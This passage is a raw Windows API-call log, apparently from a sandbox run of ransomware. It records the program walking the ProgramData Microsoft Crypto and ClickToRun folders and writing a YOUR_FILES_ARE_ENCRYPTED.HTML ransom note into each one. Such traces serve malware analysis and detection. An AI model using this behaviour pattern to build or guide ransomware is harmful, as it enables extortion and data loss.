nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.666] CloseHandle (hObject=0x58c) returned 1 [0156.667] GetProcessHeap () returned 0x270000 [0156.667] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.674] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0156.674] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.675] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.675] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.675] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.677] CloseHandle (hObject=0x4a8) returned 1 [0156.677] GetProcessHeap () returned 0x270000 [0156.678] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.679] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0156.679] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0156.679] GetProcessHeap () returned 0x270000 [0156.679] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.681] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" [0156.681] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*" [0156.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.681] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.682] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DSS", cAlternateFileName="")) returned 1 [0156.682] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0156.682] GetProcessHeap () returned 0x270000 [0156.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.682] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" [0156.682] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*" [0156.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0156.683] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0156.683] GetProcessHeap () returned 0x270000 [0156.683] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.683] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" [0156.683] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0156.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.683] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.683] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.683] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.684] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0156.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.684] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.686] CloseHandle (hObject=0x598) returned 1 [0156.686] GetProcessHeap () returned 0x270000 [0156.687] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.687] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0156.687] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.687] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.687] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.688] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.689] CloseHandle (hObject=0x58c) returned 1 [0156.690] GetProcessHeap () returned 0x270000 [0156.690] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.690] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Keys", cAlternateFileName="")) returned 1 [0156.690] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0156.690] GetProcessHeap () returned 0x270000 [0156.691] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.691] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" [0156.691] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*" [0156.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.691] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.691] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.691] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.691] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0156.691] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.691] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.693] CloseHandle (hObject=0x58c) returned 1 [0156.694] GetProcessHeap () returned 0x270000 [0156.694] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.694] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0156.694] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0156.694] GetProcessHeap () returned 0x270000 [0156.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.695] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" [0156.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*" [0156.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.695] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.695] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0156.695] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0156.695] GetProcessHeap () returned 0x270000 [0156.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.695] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" [0156.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0156.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.695] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.695] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.695] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.695] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0156.696] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.696] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.698] CloseHandle (hObject=0x598) returned 1 [0156.698] GetProcessHeap () returned 0x270000 [0156.699] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.699] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0156.699] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.699] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.699] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.703] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.705] CloseHandle (hObject=0x58c) returned 1 [0156.706] GetProcessHeap () returned 0x270000 [0156.706] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 